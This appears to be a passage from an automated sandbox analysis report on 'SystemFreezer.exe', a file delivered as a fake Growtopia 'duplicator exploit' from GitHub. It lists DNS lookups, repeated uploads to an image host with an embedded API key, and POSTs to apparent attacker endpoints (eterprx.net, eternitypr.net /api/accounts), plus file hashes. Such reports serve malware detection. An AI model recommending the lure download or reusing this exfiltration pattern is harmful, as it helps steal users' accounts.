                                    142.179.250.142.in-addr.arpa
                                    IN PTR
                                    Response
                                    142.179.250.142.in-addr.arpa
                                    IN PTR
                                    ams17s10-in-f141e100net
                                  • flag-us
                                    DNS
                                    api.imgbb.com
                                    SystemFreezer.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    api.imgbb.com
                                    IN A
                                    Response
                                    api.imgbb.com
                                    IN A
                                    188.114.97.0
                                    api.imgbb.com
                                    IN A
                                    188.114.96.0
                                  • flag-us
                                    POST
                                    https://api.imgbb.com/1/upload?key=78adae1bfa0e608b56435fa339987449
                                    SystemFreezer.exe
                                    Remote address:
                                    188.114.97.0:443
                                    Request
                                    POST /1/upload?key=78adae1bfa0e608b56435fa339987449 HTTP/1.1
                                    Accept: application/json
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: api.imgbb.com
                                    Content-Length: 88722
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 400 Bad Request
                                    Date: Tue, 28 Nov 2023 13:52:46 GMT
                                    Content-Type: application/json; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    access-control-allow-origin: *
                                    access-control-allow-headers: Cache-Control, X-Requested-With, Content-Type
                                    access-control-allow-methods: POST, GET, OPTIONS
                                    last-modified: Tue, 28 Nov 2023 13:52:46GMT
                                    Cache-Control: no-cache, must-revalidate
                                    pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nR7K3DEl6%2B1A5zUIIZ7%2FO1PFT9WeS25o5cm14RpuFXCOVyB9Hqae%2F%2Bq9Bt1e%2BLCq0d2er%2B2mu%2Blv8LYtP3GHIEWtbRae6Gfp55lVCG32beY8BEBc7%2Fe5p4F9I4fzYUJ6"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 82d317e10c651c84-AMS
                                    alt-svc: h3=":443"; ma=86400
                                  • flag-us
                                    DNS
                                    eterprx.net
                                    SystemFreezer.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    eterprx.net
                                    IN A
                                    Response
                                    eterprx.net
                                    IN A
                                    104.21.20.223
                                    eterprx.net
                                    IN A
                                    172.67.194.181
                                  • flag-us
                                    POST
                                    https://eterprx.net/api/accounts
                                    SystemFreezer.exe
                                    Remote address:
                                    104.21.20.223:443
                                    Request
                                    POST /api/accounts HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: eterprx.net
                                    Content-Length: 221
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 400 Bad Request
                                    Date: Tue, 28 Nov 2023 13:52:46 GMT
                                    Content-Type: application/json
                                    Content-Length: 23
                                    Connection: keep-alive
                                    x-powered-by: PHP/7.2.34
                                    cache-control: no-cache, private
                                    x-ratelimit-limit: 30
                                    x-ratelimit-remaining: 29
                                    vary: User-Agent
                                    x-turbo-charged-by: LiteSpeed
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=g2SoWJbe4Y%2F0aaV0UQAIV0h3Yds86HpCr49IZLrazNoSGrIkBwoYj7x%2Fk0NsDuHZ667Weun2TM7hd56oMyvOzPURgghnHVNq1E%2BYVFVAbwH0XGhf4ntRTe6nXA8HDg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 82d317e20e29660a-AMS
                                    alt-svc: h3=":443"; ma=86400
                                  • flag-us
                                    DNS
                                    eternitypr.net
                                    SystemFreezer.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    eternitypr.net
                                    IN A
                                    Response
                                    eternitypr.net
                                    IN A
                                    172.67.199.29
                                    eternitypr.net
                                    IN A
                                    104.21.21.142
                                  • flag-us
                                    POST
                                    https://eternitypr.net/api/accounts
                                    SystemFreezer.exe
                                    Remote address:
                                    172.67.199.29:443
                                    Request
                                    POST /api/accounts HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: eternitypr.net
                                    Content-Length: 221
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 400 Bad Request
                                    Date: Tue, 28 Nov 2023 13:52:46 GMT
                                    Content-Type: application/json
                                    Content-Length: 23
                                    Connection: keep-alive
                                    x-powered-by: PHP/7.2.34
                                    cache-control: no-cache, private
                                    x-ratelimit-limit: 30
                                    x-ratelimit-remaining: 29
                                    vary: User-Agent
                                    x-turbo-charged-by: LiteSpeed
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=azgDfX1WpJ2aHj%2FRSDTITfaauazqt5DLLoHgMY0c4xMCY2mVwXPTzjHtxN%2B8PTZLgq3697ZG8E5I6J8n6lqaamwP3rerDTd5c6j5gecF0CvglkILQJ4WQnpRfplyErr86w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 82d317e3294e1c90-AMS
                                    alt-svc: h3=":443"; ma=86400
                                  • flag-us
                                    DNS
                                    0.97.114.188.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    0.97.114.188.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    223.20.21.104.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    223.20.21.104.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    29.199.67.172.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    29.199.67.172.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    126.23.238.8.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    126.23.238.8.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-nl
                                    GET
                                    http://google.com/generate_204
                                    SystemFreezer.exe
                                    Remote address:
                                    142.250.179.142:80
                                    Request
                                    GET /generate_204 HTTP/1.1
                                    Host: google.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 204 No Content
                                    Content-Length: 0
                                    Cross-Origin-Resource-Policy: cross-origin
                                    Date: Tue, 28 Nov 2023 13:53:15 GMT
                                  • flag-us
                                    POST
                                    https://api.imgbb.com/1/upload?key=78adae1bfa0e608b56435fa339987449
                                    SystemFreezer.exe
                                    Remote address:
                                    188.114.97.0:443
                                    Request
                                    POST /1/upload?key=78adae1bfa0e608b56435fa339987449 HTTP/1.1
                                    Accept: application/json
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: api.imgbb.com
                                    Content-Length: 88780
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 400 Bad Request
                                    Date: Tue, 28 Nov 2023 13:53:16 GMT
                                    Content-Type: application/json; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    access-control-allow-origin: *
                                    access-control-allow-headers: Cache-Control, X-Requested-With, Content-Type
                                    access-control-allow-methods: POST, GET, OPTIONS
                                    last-modified: Tue, 28 Nov 2023 13:53:16GMT
                                    Cache-Control: no-cache, must-revalidate
                                    pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GEPM15lB6tRIsJyYLAxLVT%2BEcQN53bsKi79jz8zG2%2B4zzUiZvrDPYlI%2BEYZZhTiKzqLiihW39ToghQ18VLQR7OvhX8z2Ox9y6UuRYMMo%2BNRqZm2lt6JOHBAKIcTCUgmM"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 82d3189b88ddb706-AMS
                                    alt-svc: h3=":443"; ma=86400
                                  • flag-us
                                    POST
                                    https://eterprx.net/api/accounts
                                    SystemFreezer.exe
                                    Remote address:
                                    104.21.20.223:443
                                    Request
                                    POST /api/accounts HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: eterprx.net
                                    Content-Length: 221
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 400 Bad Request
                                    Date: Tue, 28 Nov 2023 13:53:16 GMT
                                    Content-Type: application/json
                                    Content-Length: 23
                                    Connection: keep-alive
                                    x-powered-by: PHP/7.2.34
                                    cache-control: no-cache, private
                                    x-ratelimit-limit: 30
                                    x-ratelimit-remaining: 28
                                    vary: User-Agent
                                    x-turbo-charged-by: LiteSpeed
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YmnFOMNDQkke2l8x%2FKTruPQUoNAzPTOUNO1p0wX6A2hGCObPhFhOVcFMzG9teDeDgvbUUlTjABdVLuSBhopH%2BDI5yR3XlVQJQ%2BtR%2Byu3GJjt6CLULvcs4C8xns2MUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 82d3189c59896692-AMS
                                    alt-svc: h3=":443"; ma=86400
                                  • flag-us
                                    POST
                                    https://eternitypr.net/api/accounts
                                    SystemFreezer.exe
                                    Remote address:
                                    172.67.199.29:443
                                    Request
                                    POST /api/accounts HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: eternitypr.net
                                    Content-Length: 221
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 400 Bad Request
                                    Date: Tue, 28 Nov 2023 13:53:16 GMT
                                    Content-Type: application/json
                                    Content-Length: 23
                                    Connection: keep-alive
                                    x-powered-by: PHP/7.2.34
                                    cache-control: no-cache, private
                                    x-ratelimit-limit: 30
                                    x-ratelimit-remaining: 28
                                    vary: User-Agent
                                    x-turbo-charged-by: LiteSpeed
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eRcas3BbTw3P8IdEIN%2FVjyXQRjguIsIuQrd7Oym07aDodeWbKQYcln5sXxmJFG3MJb6tJBjI5J2cCK2KFnzFaibj9kB1ytAv6WSI5avR8SyX2PSJqJkJUwq5tJX8lNoPNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 82d3189d4c0c0bb0-AMS
                                    alt-svc: h3=":443"; ma=86400
                                  • flag-us
                                    DNS
                                    43.229.111.52.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    43.229.111.52.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-nl
                                    GET
                                    http://google.com/generate_204
                                    SystemFreezer.exe
                                    Remote address:
                                    142.250.179.142:80
                                    Request
                                    GET /generate_204 HTTP/1.1
                                    Host: google.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 204 No Content
                                    Content-Length: 0
                                    Cross-Origin-Resource-Policy: cross-origin
                                    Date: Tue, 28 Nov 2023 13:54:01 GMT
                                  • flag-us
                                    POST
                                    https://api.imgbb.com/1/upload?key=78adae1bfa0e608b56435fa339987449
                                    SystemFreezer.exe
                                    Remote address:
                                    188.114.97.0:443
                                    Request
                                    POST /1/upload?key=78adae1bfa0e608b56435fa339987449 HTTP/1.1
                                    Accept: application/json
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: api.imgbb.com
                                    Content-Length: 88780
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 400 Bad Request
                                    Date: Tue, 28 Nov 2023 13:54:01 GMT
                                    Content-Type: application/json; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    access-control-allow-origin: *
                                    access-control-allow-headers: Cache-Control, X-Requested-With, Content-Type
                                    access-control-allow-methods: POST, GET, OPTIONS
                                    last-modified: Tue, 28 Nov 2023 13:54:01GMT
                                    Cache-Control: no-cache, must-revalidate
                                    pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BzleUYrKox51CBFm7Un1McYrcmpBUaHIfXFIPJoyIvwi%2FHYX0gRUscAzDtrfsARRUZryJd6goc93ufvSEq5SnR3zSSizg6t9ILrqdmNTTCwzcOCaz%2FBeY3%2FKf%2F5o%2B6%2Bx"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 82d319ba198a672a-AMS
                                    alt-svc: h3=":443"; ma=86400
                                  • flag-us
                                    POST
                                    https://eterprx.net/api/accounts
                                    SystemFreezer.exe
                                    Remote address:
                                    104.21.20.223:443
                                    Request
                                    POST /api/accounts HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: eterprx.net
                                    Content-Length: 221
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 400 Bad Request
                                    Date: Tue, 28 Nov 2023 13:54:02 GMT
                                    Content-Type: application/json
                                    Content-Length: 23
                                    Connection: keep-alive
                                    x-powered-by: PHP/7.2.34
                                    cache-control: no-cache, private
                                    x-ratelimit-limit: 30
                                    x-ratelimit-remaining: 29
                                    vary: User-Agent
                                    x-turbo-charged-by: LiteSpeed
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q0K2PDqlyhJiP78NPPqam4opuXZvH1HAytYz5zsKIUhPEwrJFtrgsx8eYqysDX1YLpkjhymo5QPQO9cX5Wg2eMXCZvMcKAzeHxAWsEwqZCAf3s1hnwH%2B1hC0Er4I6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 82d319bb1e220e6c-AMS
                                    alt-svc: h3=":443"; ma=86400
                                  • flag-us
                                    POST
                                    https://eternitypr.net/api/accounts
                                    SystemFreezer.exe
                                    Remote address:
                                    172.67.199.29:443
                                    Request
                                    POST /api/accounts HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: eternitypr.net
                                    Content-Length: 221
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 400 Bad Request
                                    Date: Tue, 28 Nov 2023 13:54:02 GMT
                                    Content-Type: application/json
                                    Content-Length: 23
                                    Connection: keep-alive
                                    x-powered-by: PHP/7.2.34
                                    cache-control: no-cache, private
                                    x-ratelimit-limit: 30
                                    x-ratelimit-remaining: 29
                                    vary: User-Agent
                                    x-turbo-charged-by: LiteSpeed
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fGvCic%2F%2BvYKvSEr%2BFRdpyQ0OSjANvkOKkXQmziFSZt7qUgpj%2FQoMJaYY2zPXq6xFUSh1GcgAj3gbdNhmI%2B8j7JgVeCxsTFxxlf%2BAwLT3ooMGtpT2FsPQsdGuhYFNFW090A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 82d319bcfef8669f-AMS
                                    alt-svc: h3=":443"; ma=86400
                                  • flag-us
                                    DNS
                                    9.73.50.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    9.73.50.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • 140.82.121.4:443
                                    https://github.com/L3GOGT/Growtopia-Duplicator-Exploit/releases/download/working/GT.Duplicator.Exploit.zip
                                    tls, http2
                                    msedge.exe
                                    2.0kB
                                    7.3kB
                                    17
                                    18

                                    HTTP Request

                                    GET https://github.com/L3GOGT/Growtopia-Duplicator-Exploit/releases/download/working/GT.Duplicator.Exploit.zip

                                    HTTP Response

                                    302
                                  • 140.82.121.4:443
                                    github.com
                                    tls
                                    msedge.exe
                                    1.1kB
                                    3.3kB
                                    11
                                    8
                                  • 185.199.108.133:443
                                    https://objects.githubusercontent.com/github-production-release-asset-2e65be/720728519/61dfee5a-f15d-4efe-af74-89e64074c3e8?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20231128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231128T135213Z&X-Amz-Expires=300&X-Amz-Signature=015bdac000d887ef1119379a29a54a90df4fc22aa6110245de2f8a59376b7574&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=720728519&response-content-disposition=attachment%3B%20filename%3DGT.Duplicator.Exploit.zip&response-content-type=application%2Foctet-stream
                                    tls, http2
                                    msedge.exe
                                    13.2kB
                                    650.5kB
                                    254
                                    493

                                    HTTP Request

                                    GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/720728519/61dfee5a-f15d-4efe-af74-89e64074c3e8?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20231128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231128T135213Z&X-Amz-Expires=300&X-Amz-Signature=015bdac000d887ef1119379a29a54a90df4fc22aa6110245de2f8a59376b7574&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=720728519&response-content-disposition=attachment%3B%20filename%3DGT.Duplicator.Exploit.zip&response-content-type=application%2Foctet-stream

                                    HTTP Response

                                    200
                                  • 204.79.197.200:443
                                    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid=
                                    tls, http2
                                    1.9kB
                                    9.3kB
                                    22
                                    20

                                    HTTP Request

                                    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid=

                                    HTTP Response

                                    204

                                    HTTP Request

                                    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid=

                                    HTTP Response

                                    204

                                    HTTP Request

                                    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid=

                                    HTTP Response

                                    204
                                  • 142.250.179.142:80
                                    http://google.com/generate_204
                                    http
                                    SystemFreezer.exe
                                    302 B
                                    259 B
                                    5
                                    3

                                    HTTP Request

                                    GET http://google.com/generate_204

                                    HTTP Response

                                    204
                                  • 188.114.97.0:443
                                    https://api.imgbb.com/1/upload?key=78adae1bfa0e608b56435fa339987449
                                    tls, http
                                    SystemFreezer.exe
                                    92.4kB
                                    7.5kB
                                    73
                                    39

                                    HTTP Request

                                    POST https://api.imgbb.com/1/upload?key=78adae1bfa0e608b56435fa339987449

                                    HTTP Response

                                    400
                                  • 104.21.20.223:443
                                    https://eterprx.net/api/accounts
                                    tls, http
                                    SystemFreezer.exe
                                    1.1kB
                                    3.9kB
                                    9
                                    8

                                    HTTP Request

                                    POST https://eterprx.net/api/accounts

                                    HTTP Response

                                    400
                                  • 172.67.199.29:443
                                    https://eternitypr.net/api/accounts
                                    tls, http
                                    SystemFreezer.exe
                                    1.1kB
                                    3.9kB
                                    9
                                    8

                                    HTTP Request

                                    POST https://eternitypr.net/api/accounts

                                    HTTP Response

                                    400
                                  • 142.250.179.142:80
                                    http://google.com/generate_204
                                    http
                                    SystemFreezer.exe
                                    302 B
                                    259 B
                                    5
                                    3

                                    HTTP Request

                                    GET http://google.com/generate_204

                                    HTTP Response

                                    204
                                  • 188.114.97.0:443
                                    https://api.imgbb.com/1/upload?key=78adae1bfa0e608b56435fa339987449
                                    tls, http
                                    SystemFreezer.exe
                                    92.4kB
                                    7.3kB
                                    73
                                    36

                                    HTTP Request

                                    POST https://api.imgbb.com/1/upload?key=78adae1bfa0e608b56435fa339987449

                                    HTTP Response

                                    400
                                  • 104.21.20.223:443
                                    https://eterprx.net/api/accounts
                                    tls, http
                                    SystemFreezer.exe
                                    1.1kB
                                    3.9kB
                                    9
                                    8

                                    HTTP Request

                                    POST https://eterprx.net/api/accounts

                                    HTTP Response

                                    400
                                  • 172.67.199.29:443
                                    https://eternitypr.net/api/accounts
                                    tls, http
                                    SystemFreezer.exe
                                    1.1kB
                                    3.9kB
                                    9
                                    8

                                    HTTP Request

                                    POST https://eternitypr.net/api/accounts

                                    HTTP Response

                                    400
                                  • 142.250.179.142:80
                                    http://google.com/generate_204
                                    http
                                    SystemFreezer.exe
                                    302 B
                                    259 B
                                    5
                                    3

                                    HTTP Request

                                    GET http://google.com/generate_204

                                    HTTP Response

                                    204
                                  • 188.114.97.0:443
                                    https://api.imgbb.com/1/upload?key=78adae1bfa0e608b56435fa339987449
                                    tls, http
                                    SystemFreezer.exe
                                    92.4kB
                                    7.4kB
                                    73
                                    38

                                    HTTP Request

                                    POST https://api.imgbb.com/1/upload?key=78adae1bfa0e608b56435fa339987449

                                    HTTP Response

                                    400
                                  • 104.21.20.223:443
                                    https://eterprx.net/api/accounts
                                    tls, http
                                    SystemFreezer.exe
                                    1.1kB
                                    3.9kB
                                    9
                                    8

                                    HTTP Request

                                    POST https://eterprx.net/api/accounts

                                    HTTP Response

                                    400
                                  • 172.67.199.29:443
                                    https://eternitypr.net/api/accounts
                                    tls, http
                                    SystemFreezer.exe
                                    1.1kB
                                    3.9kB
                                    9
                                    8

                                    HTTP Request

                                    POST https://eternitypr.net/api/accounts

                                    HTTP Response

                                    400
                                  • 8.8.8.8:53
                                    67.31.126.40.in-addr.arpa
                                    dns
                                    71 B
                                    157 B
                                    1
                                    1

                                    DNS Request

                                    67.31.126.40.in-addr.arpa

                                  • 8.8.8.8:53
                                    github.com
                                    dns
                                    msedge.exe
                                    56 B
                                    72 B
                                    1
                                    1

                                    DNS Request

                                    github.com

                                    DNS Response

                                    140.82.121.4

                                  • 8.8.8.8:53
                                    4.121.82.140.in-addr.arpa
                                    dns
                                    71 B
                                    115 B
                                    1
                                    1

                                    DNS Request

                                    4.121.82.140.in-addr.arpa

                                  • 8.8.8.8:53
                                    95.221.229.192.in-addr.arpa
                                    dns
                                    73 B
                                    144 B
                                    1
                                    1

                                    DNS Request

                                    95.221.229.192.in-addr.arpa

                                  • 8.8.8.8:53
                                    198.1.85.104.in-addr.arpa
                                    dns
                                    71 B
                                    135 B
                                    1
                                    1

                                    DNS Request

                                    198.1.85.104.in-addr.arpa

                                  • 8.8.8.8:53
                                    objects.githubusercontent.com
                                    dns
                                    msedge.exe
                                    75 B
                                    139 B
                                    1
                                    1

                                    DNS Request

                                    objects.githubusercontent.com

                                    DNS Response

                                    185.199.108.133
                                    185.199.109.133
                                    185.199.110.133
                                    185.199.111.133

                                  • 8.8.8.8:53
                                    133.108.199.185.in-addr.arpa
                                    dns
                                    74 B
                                    118 B
                                    1
                                    1

                                    DNS Request

                                    133.108.199.185.in-addr.arpa

                                  • 224.0.0.251:5353
                                    514 B
                                    8
                                  • 8.8.8.8:53
                                    9.228.82.20.in-addr.arpa
                                    dns
                                    70 B
                                    156 B
                                    1
                                    1

                                    DNS Request

                                    9.228.82.20.in-addr.arpa

                                  • 8.8.8.8:53
                                    g.bing.com
                                    dns
                                    56 B
                                    158 B
                                    1
                                    1

                                    DNS Request

                                    g.bing.com

                                    DNS Response

                                    204.79.197.200
                                    13.107.21.200

                                  • 8.8.8.8:53
                                    200.197.79.204.in-addr.arpa
                                    dns
                                    73 B
                                    106 B
                                    1
                                    1

                                    DNS Request

                                    200.197.79.204.in-addr.arpa

                                  • 8.8.8.8:53
                                    203.33.253.131.in-addr.arpa
                                    dns
                                    73 B
                                    107 B
                                    1
                                    1

                                    DNS Request

                                    203.33.253.131.in-addr.arpa

                                  • 8.8.8.8:53
                                    103.169.127.40.in-addr.arpa
                                    dns
                                    73 B
                                    147 B
                                    1
                                    1

                                    DNS Request

                                    103.169.127.40.in-addr.arpa

                                  • 8.8.8.8:53
                                    15.164.165.52.in-addr.arpa
                                    dns
                                    72 B
                                    146 B
                                    1
                                    1

                                    DNS Request

                                    15.164.165.52.in-addr.arpa

                                  • 8.8.8.8:53
                                    25.14.97.104.in-addr.arpa
                                    dns
                                    71 B
                                    135 B
                                    1
                                    1

                                    DNS Request

                                    25.14.97.104.in-addr.arpa

                                  • 8.8.8.8:53
                                    google.com
                                    dns
                                    SystemFreezer.exe
                                    56 B
                                    72 B
                                    1
                                    1

                                    DNS Request

                                    google.com

                                    DNS Response

                                    142.250.179.142

                                  • 8.8.8.8:53
                                    142.179.250.142.in-addr.arpa
                                    dns
                                    74 B
                                    113 B
                                    1
                                    1

                                    DNS Request

                                    142.179.250.142.in-addr.arpa

                                  • 8.8.8.8:53
                                    api.imgbb.com
                                    dns
                                    SystemFreezer.exe
                                    59 B
                                    91 B
                                    1
                                    1

                                    DNS Request

                                    api.imgbb.com

                                    DNS Response

                                    188.114.97.0
                                    188.114.96.0

                                  • 8.8.8.8:53
                                    eterprx.net
                                    dns
                                    SystemFreezer.exe
                                    57 B
                                    89 B
                                    1
                                    1

                                    DNS Request

                                    eterprx.net

                                    DNS Response

                                    104.21.20.223
                                    172.67.194.181

                                  • 8.8.8.8:53
                                    eternitypr.net
                                    dns
                                    SystemFreezer.exe
                                    60 B
                                    92 B
                                    1
                                    1

                                    DNS Request

                                    eternitypr.net

                                    DNS Response

                                    172.67.199.29
                                    104.21.21.142

                                  • 8.8.8.8:53
                                    0.97.114.188.in-addr.arpa
                                    dns
                                    71 B
                                    133 B
                                    1
                                    1

                                    DNS Request

                                    0.97.114.188.in-addr.arpa

                                  • 8.8.8.8:53
                                    223.20.21.104.in-addr.arpa
                                    dns
                                    72 B
                                    134 B
                                    1
                                    1

                                    DNS Request

                                    223.20.21.104.in-addr.arpa

                                  • 8.8.8.8:53
                                    29.199.67.172.in-addr.arpa
                                    dns
                                    72 B
                                    134 B
                                    1
                                    1

                                    DNS Request

                                    29.199.67.172.in-addr.arpa

                                  • 8.8.8.8:53
                                    126.23.238.8.in-addr.arpa
                                    dns
                                    71 B
                                    125 B
                                    1
                                    1

                                    DNS Request

                                    126.23.238.8.in-addr.arpa

                                  • 8.8.8.8:53
                                    43.229.111.52.in-addr.arpa
                                    dns
                                    72 B
                                    158 B
                                    1
                                    1

                                    DNS Request

                                    43.229.111.52.in-addr.arpa

                                  • 8.8.8.8:53
                                    9.73.50.20.in-addr.arpa
                                    dns
                                    69 B
                                    155 B
                                    1
                                    1

                                    DNS Request

                                    9.73.50.20.in-addr.arpa

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\8098e008-9e02-4728-bf94-30b8a677882a.tmp

                                    Filesize

                                    10KB

                                    MD5

                                    ac0ca66ac4c91ca3b77783527979b645

                                    SHA1

                                    317c25230f0a90a5ecd27fbac4a5cc38d7dc5c5c

                                    SHA256

                                    6b06c317071768e8c127cfbb5390664a552d273d1357aa523a120bfba1a6c71f

                                    SHA512

                                    07b45f6509b702bc334a4423ea8f1e718e2e1d6040917088e6b96a9a57f04801a9d221fcefa173976dcda9bc575ca08fb44f82ade528ddf67daffd6be1aebebc

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                    Filesize

                                    152B

                                    MD5

                                    208a234643c411e1b919e904ee20115e

                                    SHA1

                                    400b6e6860953f981bfe4716c345b797ed5b2b5b

                                    SHA256

                                    af80020ae43388bbd3db31c75aade369d489a30a933574dea19163e094d5f458

                                    SHA512

                                    2779b96325234c836cbb91820ee332ed56c15b534ec0c7770b322a5c03849ec3ee67b0ec7978e1fab563eeed1cea96f5155d7b942702555d9352ff6711a548d2

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                    Filesize

                                    265B

                                    MD5

                                    f5cd008cf465804d0e6f39a8d81f9a2d

                                    SHA1

                                    6b2907356472ed4a719e5675cc08969f30adc855

                                    SHA256

                                    fcea95cc39dc6c2a925f5aed739dbedaa405ee4ce127f535fcf1c751b2b8fb5d

                                    SHA512

                                    dc97034546a4c94bdaa6f644b5cfd1e477209de9a03a5b02a360c254a406c1d647d6f90860f385e27387b35631c41f0886cb543ede9116436941b9af6cd3285d

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                    Filesize

                                    111B

                                    MD5

                                    285252a2f6327d41eab203dc2f402c67

                                    SHA1

                                    acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                    SHA256

                                    5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                    SHA512

                                    11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                    Filesize

